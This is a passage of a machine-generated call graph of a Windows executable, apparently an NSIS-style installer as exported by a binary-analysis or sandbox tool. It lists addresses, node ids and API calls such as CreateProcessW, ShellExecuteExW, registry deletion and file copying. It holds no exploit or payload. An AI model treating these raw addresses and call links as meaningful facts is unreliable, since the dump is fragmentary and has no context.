3726->3725 3728 405dc1 ReadFile 3727->3728 3729 403149 3728->3729 3729->3706 3729->3707 3729->3709 3731 4067cc 3730->3731 3732 4067d4 3730->3732 3731->3717 3732->3731 3733 406864 GlobalAlloc 3732->3733 3734 40685b GlobalFree 3732->3734 3735 4068d2 GlobalFree 3732->3735 3736 4068db GlobalAlloc 3732->3736 3733->3731 3733->3732 3734->3733 3735->3736 3736->3731 3736->3732 3737->3702 4261 402570 4262 402c37 17 API calls 4261->4262 4263 402577 4262->4263 4266 405d3e GetFileAttributesW CreateFileW 4263->4266 4265 402583 4266->4265 3738 401b71 3739 401bc2 3738->3739 3740 401b7e 3738->3740 3741 401bc7 3739->3741 3742 401bec GlobalAlloc 3739->3742 3743 4022de 3740->3743 3748 401b95 3740->3748 3751 401c07 3741->3751 3759 40624c lstrcpynW 3741->3759 3744 40626e 17 API calls 3742->3744 3745 40626e 17 API calls 3743->3745 3744->3751 3747 4022eb 3745->3747 3753 4058ae MessageBoxIndirectW 3747->3753 3757 40624c lstrcpynW 3748->3757 3749 401bd9 GlobalFree 3749->3751 3752 401ba4 3758 40624c lstrcpynW 3752->3758 3753->3751 3755 401bb3 3760 40624c lstrcpynW 3755->3760 3757->3752 3758->3755 3759->3749 3760->3751 3761 4024f2 3762 402c77 17 API calls 3761->3762 3763 4024fc 3762->3763 3764 402c15 17 API calls 3763->3764 3765 402505 3764->3765 3766 402521 RegEnumKeyW 3765->3766 3767 40252d RegEnumValueW 3765->3767 3769 402885 3765->3769 3770 402549 RegCloseKey 3766->3770 3768 402542 3767->3768 3767->3770 3768->3770 3770->3769 4267 401a72 4268 402c15 17 API calls 4267->4268 4269 401a78 4268->4269 4270 402c15 17 API calls 4269->4270 4271 401a20 4270->4271 3772 401573 3773 401583 ShowWindow 3772->3773 3774 40158c 3772->3774 3773->3774 3775 40159a ShowWindow 3774->3775 3776 402abf 3774->3776 3775->3776 4272 4042f5 lstrcpynW lstrlenW 4273 4014f5 SetForegroundWindow 4274 402abf 4273->4274 4282 401e77 4283 402c37 17 API calls 4282->4283 4284 401e7d 4283->4284 4285 402c37 17 API calls 4284->4285 4286 401e86 4285->4286 4287 402c37 17 API calls 4286->4287 4288 401e8f 4287->4288 4289 402c37 17 API calls 4288->4289 4290 401e98 4289->4290 4291 401423 24 API calls 4290->4291 4292 401e9f 4291->4292 4299 405874 ShellExecuteExW 4292->4299 4294 401ee1 4295 402885 4294->4295 4296 4066d7 5 API calls 4294->4296 4297 401efb CloseHandle 4296->4297 4297->4295 4299->4294 3799 40167b 3800 402c37 17 API calls 3799->3800 3801 401682 3800->3801 3802 402c37 17 API calls 3801->3802 3803 40168b 3802->3803 3804 402c37 17 API calls 3803->3804 3805 401694 MoveFileW 3804->3805 3806 4016a0 3805->3806 3807 4016a7 3805->3807 3809 401423 24 API calls 3806->3809 3808 40658f 2 API calls 3807->3808 3811 40224a 3807->3811 3810 4016b6 3808->3810 3809->3811 3810->3811 3812 406012 36 API calls 3810->3812 3812->3806 4078 4020fe 4079 402c37 17 API calls 4078->4079 4080 402105 4079->4080 4081 402c37 17 API calls 4080->4081 4082 40210f 4081->4082 4083 402c37 17 API calls 4082->4083 4084 402119 4083->4084 4085 402c37 17 API calls 4084->4085 4086 402123 4085->4086 4087 402c37 17 API calls 4086->4087 4088 40212d 4087->4088 4089 40216c CoCreateInstance 4088->4089 4090 402c37 17 API calls 4088->4090 4093 40218b 4089->4093 4090->4089 4091 401423 24 API calls 4092 40224a 4091->4092 4093->4091 4093->4092 4094 40247e 4095 402c77 17 API calls 4094->4095 4096 402488 4095->4096 4097 402c37 17 API calls 4096->4097 4098 402491 4097->4098 4099 40249c RegQueryValueExW 4098->4099 4103 402885 4098->4103 4100 4024c2 RegCloseKey 4099->4100 4101 4024bc 4099->4101 4100->4103 4101->4100 4105 406193 wsprintfW 4101->4105 4105->4100 4300 40437e 4301 404396 4300->4301 4308 4044b0 4300->4308 4305 4041e1 18 API calls 4301->4305 4302 40451a 4303 4045e4 4302->4303 4304 404524 GetDlgItem 4302->4304 4310 404248 8 API calls 4303->4310 4306 4045a5 4304->4306 4307 40453e 4304->4307 4309 4043fd 4305->4309 4306->4303 4314 4045b7 4306->4314 4307->4306 4313 404564 SendMessageW LoadCursorW SetCursor 4307->4313 4308->4302 4308->4303 4311 4044eb GetDlgItem SendMessageW 4308->4311 4312 4041e1 18 API calls 4309->4312 4325 4045df 4310->4325 4333 404203 KiUserCallbackDispatcher 4311->4333 4317 40440a CheckDlgButton 4312->4317 4337 40462d 4313->4337 4319 4045cd 4314->4319 4320 4045bd SendMessageW 4314->4320 4316 404515 4334 404609 4316->4334 4331 404203 KiUserCallbackDispatcher 4317->4331 4324 4045d3 SendMessageW 4319->4324 4319->4325 4320->4319 4324->4325 4326 404428 GetDlgItem 4332 404216 SendMessageW 4326->4332 4328 40443e SendMessageW 4329 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4328->4329 4330 40445b GetSysColor 4328->4330 4329->4325 4330->4329 4331->4326 4332->4328 4333->4316 4335 404617 4334->4335 4336 40461c SendMessageW 4334->4336 4335->4336 4336->4302 4340 405874 ShellExecuteExW 4337->4340 4339 404593 LoadCursorW SetCursor 4339->4306 4340->4339 4341 4019ff 4342 402c37 17 API calls 4341->4342 4343 401a06 4342->4343 4344 402c37 17 API calls 4343->4344 4345 401a0f 4344->4345 4346 401a16 lstrcmpiW 4345->4346 4347 401a28 lstrcmpW 4345->4347 4348 401a1c 4346->4348 4347->4348 3162 401f00 3177 402c37 3162->3177 3169 402885 3172 401f2b 3173 401f30 3172->3173 3174 401f3b 3172->3174 3202 406193 wsprintfW 3173->3202 3176 401f39 CloseHandle 3174->3176 3176->3169 3178 402c43 3177->3178 3203 40626e 3178->3203 3181 401f06 3183 4052b0 3181->3183 3184 4052cb 3183->3184 3193 401f10 3183->3193 3185 4052e7 lstrlenW 3184->3185 3186 40626e 17 API calls 3184->3186 3187 405310 3185->3187 3188 4052f5 lstrlenW 3185->3188 3186->3185 3190 405323 3187->3190 3191 405316 SetWindowTextW 3187->3191 3189 405307 lstrcatW 3188->3189 3188->3193 3189->3187 3192 405329 SendMessageW SendMessageW SendMessageW 3190->3192 3190->3193 3191->3190 3192->3193 3194 405831 CreateProcessW 3193->3194 3195 401f16 3194->3195 3196 405864 CloseHandle 3194->3196 3195->3169 3195->3176 3197 4066d7 WaitForSingleObject 3195->3197 3196->3195 3198 4066f1 3197->3198 3199 406703 GetExitCodeProcess 3198->3199 3245 406662 3198->3245 3199->3172 3202->3176 3207 40627b 3203->3207 3204 4064c6 3205 402c64 3204->3205 3236 40624c lstrcpynW 3204->3236 3205->3181 3220 4064e0 3205->3220 3207->3204 3208 406494 lstrlenW 3207->3208 3209 40626e 10 API calls 3207->3209 3213 4063a9 GetSystemDirectoryW 3207->3213 3214 4063bc GetWindowsDirectoryW 3207->3214 3215 4064e0 5 API calls 3207->3215 3216 40626e 10 API calls 3207->3216 3217 406437 lstrcatW 3207->3217 3218 4063f0 SHGetSpecialFolderLocation 3207->3218 3229 40611a 3207->3229 3234 406193 wsprintfW 3207->3234 3235 40624c lstrcpynW 3207->3235 3208->3207 3209->3208 3213->3207 3214->3207 3215->3207 3216->3207 3217->3207 3218->3207 3219 406408 SHGetPathFromIDListW CoTaskMemFree 3218->3219 3219->3207 3227 4064ed 3220->3227 3221 406563 3222 406568 CharPrevW 3221->3222 3225 406589 3221->3225 3222->3221 3223 406556 CharNextW 3223->3221 3223->3227 3225->3181 3226 406542 CharNextW 3226->3227 3227->3221 3227->3223 3227->3226 3228 406551 CharNextW 3227->3228 3241 405b4a 3227->3241 3228->3223 3237 4060b9 3229->3237 3232 40617e 3232->3207 3233 40614e RegQueryValueExW RegCloseKey 3233->3232 3234->3207 3235->3207 3236->3205 3238 4060c8 3237->3238 3239 4060d1 RegOpenKeyExW 3238->3239 3240 4060cc 3238->3240 3239->3240 3240->3232 3240->3233 3242 405b50 3241->3242 3243 405b66 3242->3243 3244 405b57 CharNextW 3242->3244 3243->3227 3244->3242 3246 40667f PeekMessageW 3245->3246 3247 406675 DispatchMessageW 3246->3247 3248 40668f WaitForSingleObject 3246->3248 3247->3246 3248->3198 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 401503 4361 40150b 4360->4361 4363 40151e 4360->4363 4362 402c15 17 API calls 4361->4362 4362->4363 3448 402306 3449 40230e 3448->3449 3452 402314 3448->3452 3450 402c37 17 API calls 3449->3450 3450->3452 3451 402322 3454 402330 3451->3454 3455 402c37 17 API calls 3451->3455 3452->3451 3453 402c37 17 API calls 3452->3453 3453->3451 3456 402c37 17 API calls 3454->3456 3455->3454 3457 402339 WritePrivateProfileStringW 3456->3457 4364 404a06 4365 404a32 4364->4365 4366 404a16 4364->4366 4368 404a65 4365->4368 4369 404a38 SHGetPathFromIDListW 4365->4369 4375 405892 GetDlgItemTextW 4366->4375 4371 404a4f SendMessageW 4369->4371 4372 404a48 4369->4372 4370 404a23 SendMessageW 4370->4365 4371->4368 4373 40140b 2 API calls 4372->4373 4373->4371 4375->4370 4376 401f86 4377 402c37 17 API calls 4376->4377 4378 401f8d 4377->4378 4379 406626 5 API calls 4378->4379 4380 401f9c 4379->4380 4381 401fb8 GlobalAlloc 4380->4381 4382 402020 4380->4382 4381->4382 4383 401fcc 4381->4383 4384 406626 5 API calls 4383->4384 4385 401fd3 4384->4385 4386 406626 5 API calls 4385->4386 4387 401fdd 4386->4387 4387->4382 4391 406193 wsprintfW 4387->4391 4389 402012 4392 406193 wsprintfW 4389->4392 4391->4389 4392->4382 3465 403d08 3466 403d20 3465->3466 3467 403e5b 3465->3467 3466->3467 3469 403d2c 3466->3469 3468 403e6c GetDlgItem GetDlgItem 3467->3468 3473 403eac 3467->3473 3472 4041e1 18 API calls 3468->3472 3470 403d37 SetWindowPos 3469->3470 3471 403d4a 3469->3471 3470->3471 3475 403d67 3471->3475 3476 403d4f ShowWindow 3471->3476 3477 403e96 SetClassLongW 3472->3477 3474 403f06 3473->3474 3482 401389 2 API calls 3473->3482 3483 403e56 3474->3483 3536 40422d 3474->3536 3479 403d89 3475->3479 3480 403d6f DestroyWindow 3475->3480 3476->3475 3481 40140b 2 API calls 3477->3481 3485 403d8e SetWindowLongW 3479->3485 3486 403d9f 3479->3486 3484 40416a 3480->3484 3481->3473 3487 403ede 3482->3487 3484->3483 3493 40419b ShowWindow 3484->3493 3485->3483 3490 403e48 3486->3490 3491 403dab GetDlgItem 3486->3491 3487->3474 3492 403ee2 SendMessageW 3487->3492 3488 40140b 2 API calls 3505 403f18 3488->3505 3489 40416c DestroyWindow EndDialog 3489->3484 3558 404248 3490->3558 3494 403ddb 3491->3494 3495 403dbe SendMessageW IsWindowEnabled 3491->3495 3492->3483 3493->3483 3498 403de8 3494->3498 3499 403dfb 3494->3499 3500 403e2f SendMessageW 3494->3500 3509 403de0 3494->3509 3495->3483 3495->3494 3497 40626e 17 API calls 3497->3505 3498->3500 3498->3509 3502 403e03 3499->3502 3503 403e18 3499->3503 3500->3490 3552 40140b 3502->3552 3507 40140b 2 API calls 3503->3507 3504 403e16 3504->3490 3505->3483 3505->3488 3505->3489 3505->3497 3508 4041e1 18 API calls 3505->3508 3527 4040ac DestroyWindow 3505->3527 3539 4041e1 3505->3539 3510 403e1f 3507->3510 3508->3505 3555 4041ba 3509->3555 3510->3490 3510->3509 3512 403f93 GetDlgItem 3513 403fb0 ShowWindow KiUserCallbackDispatcher 3512->3513 3514 403fa8 3512->3514 3542 404203 KiUserCallbackDispatcher 3513->3542 3514->3513 3516 403fda EnableWindow 3521 403fee 3516->3521 3517 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3518 404023 SendMessageW 3517->3518 3517->3521 3518->3521 3521->3517 3543 404216 SendMessageW 3521->3543 3544 403ce9 3521->3544 3547 40624c lstrcpynW 3521->3547 3523 404052 lstrlenW 3524 40626e 17 API calls 3523->3524 3525 404068 SetWindowTextW 3524->3525 3548 401389 3525->3548 3527->3484 3528 4040c6 CreateDialogParamW 3527->3528 3528->3484 3529 4040f9 3528->3529 3530 4041e1 18 API calls 3529->3530 3531 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3530->3531 3532 401389 2 API calls 3531->3532 3533 40414a 3532->3533 3533->3483 3534 404152 ShowWindow 3533->3534 3535 40422d SendMessageW 3534->3535 3535->3484 3537 404245 3536->3537 3538 404236 SendMessageW 3536->3538 3537->3505 3538->3537 3540 40626e 17 API calls 3539->3540 3541 4041ec SetDlgItemTextW 3540->3541 3541->3512 3542->3516 3543->3521 3545 40626e 17 API calls 3544->3545 3546 403cf7 SetWindowTextW 3545->3546 3546->3521 3547->3523 3550 401390 3548->3550 3549 4013fe 3549->3505 3550->3549 3551 4013cb MulDiv SendMessageW 3550->3551 3551->3550 3553 401389 2 API calls 3552->3553 3554 401420 3553->3554 3554->3509 3556 4041c1 3555->3556 3557 4041c7 SendMessageW 3555->3557 3556->3557 3557->3504 3559 404260 GetWindowLongW 3558->3559 3569 4042e9 3558->3569 3560 404271 3559->3560 3559->3569 3561 404280 GetSysColor 3560->3561 3562 404283 3560->3562 3561->3562 3563 404293 SetBkMode 3562->3563 3564 404289 SetTextColor 3562->3564 3565 4042b1 3563->3565 3566 4042ab GetSysColor 3563->3566 3564->3563 3567 4042c2 3565->3567 3568 4042b8 SetBkColor 3565->3568 3566->3565 3567->3569 3570 4042d5 DeleteObject 3567->3570 3571 4042dc CreateBrushIndirect 3567->3571 3568->3567 3569->3483 3570->3571 3571->3569 3572 402388 3573 402390 3572->3573 3574 4023bb 3572->3574 3588 402c77 3573->3588 3576 402c37 17 API calls 3574->3576 3577 4023c2 3576->3577 3584 402cf5 3577->3584 3580 4023a1 3582 402c37 17 API calls 3580->3582 3581 4023cf 3583 4023a8 RegDeleteValueW RegCloseKey 3582->3583 3583->3581 3585 402d0b 3584->3585 3586 402d21 3585->3586 3593 402d2a 3585->3593 3586->3581 3589 402c37 17 API calls 3588->3589 3590 402c8e 3589->3590 3591 4060b9 RegOpenKeyExW 3590->3591 3592 402397 3591->3592 3592->3580 3592->3581 3594 4060b9 RegOpenKeyExW 3593->3594 3595 402d58 3594->3595 3596 402dd0 3595->3596 3597 402d5c 3595->3597 3596->3586 3598 402d7e RegEnumKeyW 3597->3598 3599 402d95 RegCloseKey 3597->3599 3600 402db6 RegCloseKey 3597->3600 3602 402d2a 6 API calls 3597->3602 3598->3597 3598->3599 3601 406626 5 API calls 3599->3601 3600->3596 3603 402da5 3601->3603 3602->3597 3604 402dc4 RegDeleteKeyW 3603->3604 3605 402da9 3603->3605 3604->3596 3605->3596 4400 40190c 4401 401943 4400->4401 4402 402c37 17 API calls 4401->4402 4403 401948 4402->4403 4404 40595a 67 API calls 4403->4404 4405 401951 4404->4405 4413 401d0e 4414 402c15 17 API calls 4413->4414 4415 401d15 4414->4415 4416 402c15 17 API calls 4415->4416 4417 401d21 GetDlgItem 4416->4417 4418 40258c 4417->4418 4419 40190f 4420 402c37 17 API calls 4419->4420 4421 401916 4420->4421 4422 4058ae MessageBoxIndirectW 4421->4422 4423 40191f 4422->4423 4424 401491 4425 4052b0 24 API calls 4424->4425 4426 401498 4425->4426 4427 402592 4428 4025c1 4427->4428 4429 4025a6 4427->4429 4431 4025f5 4428->4431 4432 4025c6 4428->4432 4430 402c15 17 API calls 4429->4430 4440 4025ad 4430->4440 4434 402c37 17 API calls 4431->4434 4433 402c37 17 API calls 4432->4433 4435 4025cd WideCharToMultiByte lstrlenA 4433->4435 4436 4025fc lstrlenW 4434->4436 4435->4440 4436->4440 4437 40263f 4438 402629 4438->4437 4439 405df0 WriteFile 4438->4439 4439->4437 4440->4437 4440->4438 4441 405e1f 5 API calls 4440->4441 4441->4438 4449 403918 4450 403923 4449->4450 4451 403927 4450->4451 4452 40392a GlobalAlloc 4450->4452 4452->4451 3777 401c19 3778 402c15 17 API calls 3777->3778 3779 401c20 3778->3779 3780 402c15 17 API calls 3779->3780 3781 401c2d 3780->3781 3782 401c42 3781->3782 3783 402c37 17 API calls 3781->3783 3784 401c52 3782->3784 3785 402c37 17 API calls 3782->3785 3783->3782 3786 401ca9 3784->3786 3787 401c5d 3784->3787 3785->3784 3789 402c37 17 API calls 3786->3789 3788 402c15 17 API calls 3787->3788 3790 401c62 3788->3790 3791 401cae 3789->3791 3792 402c15 17 API calls 3790->3792 3793 402c37 17 API calls 3791->3793 3794 401c6e 3792->3794 3795 401cb7 FindWindowExW 3793->3795 3796 401c99 SendMessageW 3794->3796 3797 401c7b SendMessageTimeoutW 3794->3797 3798 401cd9 3795->3798 3796->3798 3797->3798 4453 402a9a SendMessageW 4454 402ab4 InvalidateRect 4453->4454 4455 402abf 4453->4455 4454->4455 4456 40281b 4457 402821 4456->4457 4458 402829 FindClose 4457->4458 4459 402abf 4457->4459 4458->4459 4460 40149e 4461 4014ac PostQuitMessage 4460->4461 4462 4022f1 4460->4462 4461->4462 4463 4029a2 4464 402c15 17 API calls 4463->4464 4465 4029a8 4464->4465 4466 4029e8 4465->4466 4467 4029cf 4465->4467 4475 402885 4465->4475 4468 402a02 4466->4468 4469 4029f2 4466->4469 4471 4029d4 4467->4471 4472 4029e5 4467->4472 4470 40626e 17 API calls 4468->4470 4473 402c15 17 API calls 4469->4473 4470->4472 4477 40624c lstrcpynW 4471->4477 4472->4475 4478 406193 wsprintfW 4472->4478 4473->4472 4477->4475 4478->4475 3444 4015a3 3445 402c37 17 API calls 3444->3445 3446 4015aa SetFileAttributesW 3445->3446 3447 4015bc 3446->3447 4486 405224 4487 405234 4486->4487 4488 405248 4486->4488 4489 40523a 4487->4489 4498 405291 4487->4498 4490 405250 IsWindowVisible 4488->4490 4494 405267 4488->4494 4492 40422d SendMessageW 4489->4492 4493 40525d 4490->4493 4490->4498 4491 405296 CallWindowProcW 4495 405244 4491->4495 4492->4495 4499 404b7a SendMessageW 4493->4499 4494->4491 4504 404bfa 4494->4504 4498->4491 4500 404bd9 SendMessageW 4499->4500 4501 404b9d GetMessagePos ScreenToClient SendMessageW 4499->4501 4502 404bd1 4500->4502 4501->4502 4503 404bd6 4501->4503 4502->4494 4503->4500 4513 40624c lstrcpynW 4504->4513 4506 404c0d 4514 406193 wsprintfW 4506->4514 4508 404c17 4509 40140b 2 API calls 4508->4509 4510 404c20 4509->4510 4515 40624c lstrcpynW 4510->4515 4512 404c27 4512->4498 4513->4506 4514->4508 4515->4512 4516 4028a7 4517 402c37 17 API calls 4516->4517 4518 4028b5 4517->4518 4519 4028cb 4518->4519 4520 402c37 17 API calls 4518->4520 4521 405d19 2 API calls 4519->4521 4520->4519 4522 4028d1 4521->4522 4544 405d3e GetFileAttributesW CreateFileW 4522->4544 4524 4028de 4525 402981 4524->4525 4526 4028ea GlobalAlloc 4524->4526 4529 402989 DeleteFileW 4525->4529 4530 40299c 4525->4530 4527 402903 4526->4527 4528 402978 CloseHandle 4526->4528 4545 4032f5 SetFilePointer 4527->4545 4528->4525 4529->4530 4532 402909 4533 4032df ReadFile 4532->4533 4534 402912 GlobalAlloc 4533->4534 4535 402922 4534->4535 4536 402956 4534->4536 4537 4030fa 35 API calls 4535->4537 4538 405df0 WriteFile 4536->4538 4543 40292f 4537->4543 4539 402962 GlobalFree 4538->4539 4540 4030fa 35 API calls 4539->4540 4541 402975 4540->4541 4541->4528 4542 40294d GlobalFree 4542->4536 4543->4542 4544->4524 4545->4532 4546 404c2c GetDlgItem GetDlgItem 4547 404c7e 7 API calls 4546->4547 4556 404e97 4546->4556 4548 404d21 DeleteObject 4547->4548 4549 404d14 SendMessageW 4547->4549 4550 404d2a 4548->4550 4549->4548 4551 404d61 4550->4551 4555 40626e 17 API calls 4550->4555 4553 4041e1 18 API calls 4551->4553 4552 404f7b 4554 405027 4552->4554 4558 404e8a 4552->4558 4564 404fd4 SendMessageW 4552->4564 4557 404d75 4553->4557 4559 405031 SendMessageW 4554->4559 4560 405039 4554->4560 4561 404d43 SendMessageW SendMessageW 4555->4561 4556->4552 4562 404b7a 5 API calls 4556->4562 4580 404f08 4556->4580 4563 4041e1 18 API calls 4557->4563 4565 404248 8 API calls 4558->4565 4559->4560 4567 405052 4560->4567 4568 40504b ImageList_Destroy 4560->4568 4575 405062 4560->4575 4561->4550 4562->4580 4581 404d83 4563->4581 4564->4558 4570 404fe9 SendMessageW 4564->4570 4571 40521d 4565->4571 4566 404f6d SendMessageW 4566->4552 4572 40505b GlobalFree 4567->4572 4567->4575 4568->4567 4569 4051d1 4569->4558 4576 4051e3 ShowWindow GetDlgItem ShowWindow 4569->4576 4574 404ffc 4570->4574 4572->4575 4573 404e58 GetWindowLongW SetWindowLongW 4577 404e71 4573->4577 4585 40500d SendMessageW 4574->4585 4575->4569 4589 404bfa 4 API calls 4575->4589 4593 40509d 4575->4593 4576->4558 4578 404e77 ShowWindow 4577->4578 4579 404e8f 4577->4579 4597 404216 SendMessageW 4578->4597 4598 404216 SendMessageW 4579->4598 4580->4552 4580->4566 4581->4573 4584 404dd3 SendMessageW 4581->4584 4586 404e52 4581->4586 4587 404e20 SendMessageW 4581->4587 4588 404e0f SendMessageW 4581->4588 4584->4581 4585->4554 4586->4573 4586->4577 4587->4581 4588->4581 4589->4593 4590 4051a7 InvalidateRect 4590->4569 4591 4051bd 4590->4591 4599 404b35 4591->4599 4592 4050cb SendMessageW 4596 4050e1 4592->4596 4593->4592 4593->4596 4595 405155 SendMessageW SendMessageW 4595->4596 4596->4590 4596->4595 4597->4558 4598->4556 4602 404a6c 4599->4602 4601 404b4a 4601->4569 4603 404a85 4602->4603 4604 40626e 17 API calls 4603->4604 4605 404ae9 4604->4605 4606 40626e 17 API calls 4605->4606 4607 404af4 4606->4607 4608 40626e 17 API calls 4607->4608 4609 404b0a lstrlenW wsprintfW SetDlgItemTextW 4608->4609 4609->4601 4610 40202c 4611 40203e 4610->4611 4621 4020f0 4610->4621 4612 402c37 17 API calls 4611->4612 4613 402045 4612->4613 4615 402c37 17 API calls 4613->4615 4614 401423 24 API calls 4619 40224a 4614->4619 4616 40204e 4615->4616 4617 402064 LoadLibraryExW 4616->4617 4618 402056 GetModuleHandleW 4616->4618 4620 402075 4617->4620 4617->4621 4618->4617 4618->4620 4630 406695 WideCharToMultiByte 4620->4630 4621->4614 4624 402086 4627 401423 24 API calls 4624->4627 4628 402096 4624->4628 4625 4020bf 4626 4052b0 24 API calls 4625->4626 4626->4628 4627->4628 4628->4619 4629 4020e2 FreeLibrary 4628->4629 4629->4619 4631 402080 4630->4631 4632 4066bf GetProcAddress 4630->4632 4631->4624 4631->4625 4632->4631 4633 40432f lstrlenW 4634 404350 WideCharToMultiByte 4633->4634 4635 40434e 4633->4635 4635->4634 4636 402a2f 4637 402c15 17 API calls 4636->4637 4638 402a35 4637->4638 4639 402a6c 4638->4639 4640 402885 4638->4640 4642 402a47 4638->4642 4639->4640 4641 40626e 17 API calls 4639->4641 4641->4640 4642->4640 4644 406193 wsprintfW 4642->4644 4644->4640 4645 401a30 4646 402c37 17 API calls 4645->4646 4647 401a39 ExpandEnvironmentStringsW 4646->4647 4648 401a4d 4647->4648 4650 401a60 4647->4650 4649 401a52 lstrcmpW 4648->4649 4648->4650 4649->4650 4651 4046b0 4652 4046dc 4651->4652 4653 4046ed 4651->4653 4712 405892 GetDlgItemTextW 4652->4712 4655 4046f9 GetDlgItem 4653->4655 4661 404758 4653->4661 4657 40470d 4655->4657 4656 4046e7 4659 4064e0 5 API calls 4656->4659 4663 404721 SetWindowTextW 4657->4663 4668 405bc8 4 API calls 4657->4668 4658 40483c 4660 4049eb 4658->4660 4714 405892 GetDlgItemTextW 4658->4714 4659->4653 4667 404248 8 API calls 4660->4667 4661->4658 4661->4660 4664 40626e 17 API calls 4661->4664 4666 4041e1 18 API calls 4663->4666 4670 4047cc SHBrowseForFolderW 4664->4670 4665 40486c 4671 405c25 18 API calls 4665->4671 4672 40473d 4666->4672 4673 4049ff 4667->4673 4669 404717 4668->4669 4669->4663 4677 405b1d 3 API calls 4669->4677 4670->4658 4674 4047e4 CoTaskMemFree 4670->4674 4675 404872 4671->4675 4676 4041e1 18 API calls 4672->4676 4678 405b1d 3 API calls 4674->4678 4715 40624c lstrcpynW 4675->4715 4679 40474b 4676->4679 4677->4663 4680 4047f1 4678->4680 4713 404216 SendMessageW 4679->4713 4683 404828 SetDlgItemTextW 4680->4683 4688 40626e 17 API calls 4680->4688 4683->4658 4684 404751 4686 406626 5 API calls 4684->4686 4685 404889 4687 406626 5 API calls 4685->4687 4686->4661 4694 404890 4687->4694 4689 404810 lstrcmpiW 4688->4689 4689->4683 4692 404821 lstrcatW 4689->4692 4690 4048d1 4716 40624c lstrcpynW 4690->4716 4692->4683 4693 4048d8 4695 405bc8 4 API calls 4693->4695 4694->4690 4698 405b69 2 API calls 4694->4698 4700 404929 4694->4700 4696 4048de GetDiskFreeSpaceW 4695->4696 4699 404902 MulDiv 4696->4699 4696->4700 4698->4694 4699->4700 4701 40499a 4700->4701 4703 404b35 20 API calls 4700->4703 4702 4049bd 4701->4702 4704 40140b 2 API calls 4701->4704 4717 404203 KiUserCallbackDispatcher 4702->4717 4705 404987 4703->4705 4704->4702 4707 40499c SetDlgItemTextW 4705->4707 4708 40498c 4705->4708 4707->4701 4710 404a6c 20 API calls 4708->4710 4709 4049d9 4709->4660 4711 404609 SendMessageW 4709->4711 4710->4701 4711->4660 4712->4656 4713->4684 4714->4665 4715->4685 4716->4693 4717->4709 4723 401db3 GetDC 4724 402c15 17 API calls 4723->4724 4725 401dc5 GetDeviceCaps MulDiv ReleaseDC 4724->4725 4726 402c15 17 API calls 4725->4726 4727 401df6 4726->4727 4728 40626e 17 API calls 4727->4728 4729 401e33 CreateFontIndirectW 4728->4729 4730 40258c 4729->4730 4731 401735 4732 402c37 17 API calls 4731->4732 4733 40173c SearchPathW 4732->4733 4734 401757 4733->4734 4735 402835 4736 40283d 4735->4736 4737 402841 FindNextFileW 4736->4737 4740 402853 4736->4740 4738 40289a 4737->4738 4737->4740 4741 40624c lstrcpynW 4738->4741 4741->4740 4742 4014b8 4743 4014be 4742->4743 4744 401389 2 API calls 4743->4744 4745 4014c6 4744->4745 3823 40333d SetErrorMode GetVersion 3824 40337c 3823->3824 3825 403382 3823->3825 3826 406626 5 API calls 3824->3826 3827 4065b6 3 API calls 3825->3827 3826->3825 3828 403398 lstrlenA 3827->3828 3828->3825 3829 4033a8 3828->3829 3830 406626 5 API calls 3829->3830 3831 4033af 3830->3831 3832 406626 5 API calls 3831->3832 3833 4033b6 3832->3833 3834 406626 5 API calls 3833->3834 3835 4033c2 #17 OleInitialize SHGetFileInfoW 3834->3835 3914 40624c lstrcpynW 3835->3914 3838 40340e GetCommandLineW 3915 40624c lstrcpynW 3838->3915 3840 403420 GetModuleHandleW 3841 403438 3840->3841 3842 405b4a CharNextW 3841->3842 3843 403447 CharNextW 3842->3843 3844 403571 GetTempPathW 3843->3844 3854 403460 3843->3854 3916 40330c 3844->3916 3846 403589 3847 4035e3 DeleteFileW 3846->3847 3848 40358d GetWindowsDirectoryW lstrcatW 3846->3848 3926 402ec1 GetTickCount GetModuleFileNameW 3847->3926 3849 40330c 12 API calls 3848->3849 3852 4035a9 3849->3852 3850 405b4a CharNextW 3850->3854 3852->3847 3855 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3852->3855 3853 4035f7 3861 405b4a CharNextW 3853->3861 3898 40369a 3853->3898 3909 4036aa 3853->3909 3854->3850 3857 40355c 3854->3857 3859 40355a 3854->3859 3858 40330c 12 API calls 3855->3858 4010 40624c lstrcpynW 3857->4010 3864 4035db 3858->3864 3859->3844 3865 403616 3861->3865 3864->3847 3864->3909 3872 403674 3865->3872 3873 4036da 3865->3873 3866 4037e4 3869 4037ec GetCurrentProcess OpenProcessToken 3866->3869 3870 403868 ExitProcess 3866->3870 3867 4036c4 3868 4058ae MessageBoxIndirectW 3867->3868 3874 4036d2 ExitProcess 3868->3874 3875 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3869->3875 3876 403838 3869->3876 3877 405c25 18 API calls 3872->3877 3878 405819 5 API calls 3873->3878 3875->3876 3879 406626 5 API calls 3876->3879 3880 403680 3877->3880 3881 4036df lstrcatW 3878->3881 3882 40383f 3879->3882 3880->3909 4011 40624c lstrcpynW 3880->4011 3884 4036f0 lstrcatW 3881->3884 3885 4036fb lstrcatW lstrcmpiW 3881->3885 3883 403854 ExitWindowsEx 3882->3883 3886 403861 3882->3886 3883->3870 3883->3886 3884->3885 3888 403717 3885->3888 3885->3909 3889 40140b 2 API calls 3886->3889 3891 403723 3888->3891 3892 40371c 3888->3892 3889->3870 3890 40368f 4012 40624c lstrcpynW 3890->4012 3894 4057fc 2 API calls 3891->3894 3893 40577f 4 API calls 3892->3893 3896 403721 3893->3896 3897 403728 SetCurrentDirectoryW 3894->3897 3896->3897 3899 403743 3897->3899 3900 403738 3897->3900 3954 40395a 3898->3954 4021 40624c lstrcpynW 3899->4021 4020 40624c lstrcpynW 3900->4020 3903 40626e 17 API calls 3904 403782 DeleteFileW 3903->3904 3905 40378f CopyFileW 3904->3905 3911 403751 3904->3911 3905->3911 3906 4037d8 3907 406012 36 API calls 3906->3907 3907->3909 3908 406012 36 API calls 3908->3911 4013 403880 3909->4013 3910 40626e 17 API calls 3910->3911 3911->3903 